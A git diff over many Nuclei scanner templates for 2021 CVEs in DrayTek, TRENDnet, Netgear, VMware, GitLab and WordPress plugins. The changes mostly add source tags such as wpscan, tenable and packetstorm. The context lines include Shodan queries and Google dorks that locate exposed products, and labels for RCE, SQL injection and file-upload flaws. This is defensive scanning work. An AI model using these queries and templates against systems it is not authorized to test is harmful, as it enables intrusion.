b/config/nuclei-templates/cves/2021/CVE-2021-20124.yaml index b0c0ac7d8..2d7f258b1 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20124.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20124.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true shodan-query: http.html:"VigorConnect" - tags: cve,cve2021,draytek,lfi,vigorconnect + tags: cve,cve2021,draytek,lfi,vigorconnect,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20137.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20137.yaml index 9f8b55c32..3f5f1d461 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20137.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20137.yaml @@ -14,7 +14,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20137 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137 - https://www.tenable.com/security/research/tra-2021-51 - tags: cve,cve2021,gryphon,xss + tags: xss,tenable,cve,cve2021,gryphon requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20150.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20150.yaml index af8daab9c..07d01288a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20150.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20150.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.html:"TEW-827DRU" - tags: cve,cve2021,trendnet,disclosure,router + tags: disclosure,router,tenable,cve,cve2021,trendnet requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20158.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20158.yaml index 2a1289ad0..1b984a31b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20158.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20158.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.html:"TEW-827DRU" - tags: cve,cve2021,trendnet,disclosure,router,intrusive + tags: disclosure,router,intrusive,tenable,cve,cve2021,trendnet requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20167.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20167.yaml index bf2fc021a..9f89779fd 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20167.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20167.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8 cve-id: CVE-2021-20167 cwe-id: CWE-77 - tags: cve,cve2021,netgear,rce,router + tags: tenable,cve,cve2021,netgear,rce,router requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-20792.yaml b/config/nuclei-templates/cves/2021/CVE-2021-20792.yaml index 8430ef636..15cb34cc8 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-20792.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-20792.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20792 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-21972.yaml b/config/nuclei-templates/cves/2021/CVE-2021-21972.yaml index c6f2dfd1a..4d2aa8a5d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-21972.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-21972.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21972 cwe-id: CWE-269 - tags: cve,cve2021,vmware,rce,vcenter,kev + tags: cve2021,vmware,rce,vcenter,kev,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-21975.yaml b/config/nuclei-templates/cves/2021/CVE-2021-21975.yaml index 9455ae546..f6c9016b4 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-21975.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-21975.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-21975 cwe-id: CWE-918 - tags: cve,cve2021,ssrf,vmware,vrealize,kev + tags: kev,packetstorm,cve,cve2021,ssrf,vmware,vrealize requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml b/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml index 51513779b..791797917 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-434 - tags: cve,cve2021,vmware,rce + tags: cve,cve2021,vmware,rce,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-22145.yaml b/config/nuclei-templates/cves/2021/CVE-2021-22145.yaml index 0be3468c7..f569f928d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-22145.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-22145.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - tags: cve,cve2021,elasticsearch + tags: cve,cve2021,elasticsearch,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/cves/2021/CVE-2021-22205.yaml b/config/nuclei-templates/cves/2021/CVE-2021-22205.yaml index 7e90d1d20..33786b436 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-22205.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-22205.yaml @@ -20,7 +20,7 @@ info: cwe-id: CWE-20 metadata: shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,rce,kev + tags: kev,hackerone,cve,cve2021,gitlab,rce requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-22873.yaml b/config/nuclei-templates/cves/2021/CVE-2021-22873.yaml index 9d125a94f..250303c80 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-22873.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-22873.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.favicon.hash:106844876 verified: "true" - tags: cve,cve2021,redirect,revive + tags: cve2021,redirect,revive,hackerone,seclists,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24146.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24146.yaml index 483136159..806a8e57e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24146.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24146.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-284 - tags: wordpress,wp-plugin,cve,cve2021 + tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24165.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24165.yaml index 4f043c3fc..ec65dbe36 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24165.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24165.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24165 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp + tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24176.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24176.yaml index eecc6cc9a..a3117f0f7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24176.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24176.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cve-id: CVE-2021-24176 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss + tags: cve,cve2021,wordpress,wp-plugin,xss,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24210.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24210.yaml index 31f45a6ce..a866cb940 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24210.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24210.yaml @@ -17,7 +17,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24210 cwe-id: CWE-601 - tags: wordpress,cve,cve2021,redirect + tags: cve2021,redirect,wpscan,wordpress,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24226.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24226.yaml index 53828a49b..3c60928cc 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24226.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24226.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24226 cwe-id: CWE-200 - tags: wordpress,cve,cve2021,wp-plugin + tags: wordpress,cve,cve2021,wp-plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24235.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24235.yaml index 903589f3e..fe9975061 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24235.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24235.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24235 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-theme + tags: xss,wp-theme,wpscan,cve,cve2021,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml index f17883b3a..b686f7dd7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24236 cwe-id: CWE-434 - tags: cve,cve2021,upload,rce,wordpress,wp-plugin,imagements,wp,unauth + tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin variables: php: "{{to_lower('{{randstr}}')}}.php" diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24237.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24237.yaml index b8f7605ff..6eefaba39 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24237.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24237.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24237 cwe-id: CWE-79 - tags: cve,cve2021,realteo,xss,wordpress,plugin + tags: cve,cve2021,realteo,xss,wordpress,plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24245.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24245.yaml index fdb2aa290..701b89e8b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24245.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24245.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24245 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24274.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24274.yaml index a51c261e2..2de17f84d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24274.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24274.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24274 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,maps + tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24275.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24275.yaml index a5a96502a..c6dabd986 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24275.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24275.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24275 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin + tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24276.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24276.yaml index b85e96822..0b8ad626a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24276.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24276.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24276 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin + tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24278.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24278.yaml index db00615e3..e1fa9ff14 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24278.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24278.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24278 - tags: cve,cve2021,wordpress,wp-plugin + tags: wordpress,wp-plugin,wpscan,cve,cve2021 requests: - method: POST diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24284.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24284.yaml index bbf0ea113..b6fbad17a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24284.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24284.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload + tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24285.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24285.yaml index 83718e5e6..3e9e5e790 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24285.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24285.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - tags: cve,cve2021,wordpress,wp-plugin,sqli + tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24288.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24288.yaml index 353e46f13..e7ca796c7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24288.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24288.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24288 cwe-id: CWE-601 - tags: wordpress,cve,cve2021,redirect,wp-plugin + tags: wpscan,wordpress,cve,cve2021,redirect,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24291.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24291.yaml index 63ca46b69..24a2882f4 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24291.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24291.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24291 cwe-id: CWE-79 - tags: cve,cve2021,xss,wordpress,wp-plugin,photo + tags: photo,wpscan,packetstorm,cve,cve2021,xss,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24298.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24298.yaml index a476389cb..038018b3a 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24298.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24298.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24298 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24300.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24300.yaml index 33ab74ea0..69c60738d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24300.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24300.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24300 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24316.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24316.yaml index 710e42cee..ccc8696c4 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24316.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24316.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24316 cwe-id: CWE-79 - tags: cve,cve2021,mediumish,xss,wordpress + tags: cve,cve2021,mediumish,xss,wordpress,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24320.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24320.yaml index 2da8f6ec7..070cdcbf7 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24320.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24320.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24320 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24335.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24335.yaml index ac8f6d3f8..597de3769 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24335.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24335.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24335 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24340.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24340.yaml index 83981c009..f7848f82d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24340.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24340.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 - tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind + tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24342.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24342.yaml index 3a16a48e1..96eb726f9 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24342.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24342.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24342 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24358.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24358.yaml index 883e4c1a9..8730e877d 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24358.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24358.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24358 cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,elementor,wp + tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24364.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24364.yaml index e11de8639..6babd75b3 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24364.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24364.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24364 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-theme + tags: cve,cve2021,wordpress,xss,wp-theme,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml index 0e9fb5eb0..abf1424b4 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24370.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-434,CWE-434 metadata: google-dork: inurl:“/wp-content/plugins/fancy-product-designer” - tags: cve,cve2021,wordpress,rce,wp-plugin,wp,fancyproduct + tags: fancyproduct,wpscan,cve,cve2021,wordpress,rce,wp-plugin,wp requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24387.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24387.yaml index 69a963289..24f5b5684 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24387.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24387.yaml @@ -17,7 +17,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24387 cwe-id: CWE-79 - tags: cve,cve2021,xss,wordpress + tags: cve,cve2021,xss,wordpress,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24389.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24389.yaml index 29998c02a..a5e827b6b 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24389.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24389.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24389 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin + tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24406.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24406.yaml index e9962f0eb..3b3096a52 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24406.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24406.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24406 cwe-id: CWE-601 - tags: wordpress,redirect,cve,cve2021 + tags: wpscan,wordpress,redirect,cve,cve2021 requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24407.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24407.yaml index d55c79db3..aeb1341ad 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24407.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24407.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24407 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-theme + tags: cve,cve2021,wordpress,xss,wp-theme,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24472.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24472.yaml index 9bbf1caed..935ae6bb3 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24472.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24472.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24472 cwe-id: CWE-918 - tags: cve,cve2021,wordpress,lfi,ssrf,oast + tags: wordpress,lfi,ssrf,oast,wpscan,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24488.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24488.yaml index 227a6f412..a58a2e079 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24488.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24488.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24488 cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24495.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24495.yaml index 7851a3c8f..0141460b0 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24495.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24495.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 - tags: cve,cve2021,wp-plugin,wordpress,xss + tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24498.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24498.yaml index 2ac66c4bd..e261e9597 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24498.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24498.yaml @@ -12,7 +12,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24498 cwe-id: CWE-79 - tags: cve,cve2021,xss,wordpress,wp-plugin + tags: cve,cve2021,xss,wordpress,wp-plugin,wpscan requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24499.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24499.yaml index ec9b42b87..40e23891e 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24499.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24499.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24499 cwe-id: CWE-434 - tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive,wp,workreap + tags: cve,cve2021,rce,workreap,wpscan,wordpress,wp-plugin,intrusive,wp requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24510.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24510.yaml index 37b803ab5..79f424bd8 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24510.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24510.yaml @@ -13,7 +13,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24510 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + tags: wp-plugin,authenticated,wpscan,wordpress,cve,cve2021 requests: - raw: diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24746.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24746.yaml index 3ed4f8b80..b4e3fe166 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24746.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24746.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-79 metadata: google-query: inurl:"/wp-content/plugins/sassy-social-share" - tags: cve,cve2021,wordpress,wp-plugin,xss,wp + tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24750.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24750.yaml index 5b5a5d471..cd8eabe13 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24750.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24750.yaml @@ -15,7 +15,7 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24750 cwe-id: CWE-89 - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated + tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin variables: num: "999999999" diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24762.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24762.yaml index 6d5d1735a..bd44c3b81 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24762.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24762.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24762 cwe-id: CWE-89 - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24838.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24838.yaml index 8f21815e3..66ac6d283 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24838.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24838.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-601 metadata: verified: "true" - tags: cve,cve2021,wordpress,wp-plugin,redirect,anycomment + tags: redirect,anycomment,wpscan,cve,cve2021,wordpress,wp-plugin requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24891.yaml b/config/nuclei-templates/cves/2021/CVE-2021-24891.yaml index f34272482..54ec60352 100644 --- a/config/nuclei-templates/cves/2021/CVE-2021-24891.yaml +++ b/config/nuclei-templates/cves/2021/CVE-2021-24891.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 - tags: cve,cve2021,dom,xss,wordpress,wp-plugin,elementor + tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2021/CVE-2021-24910.yaml 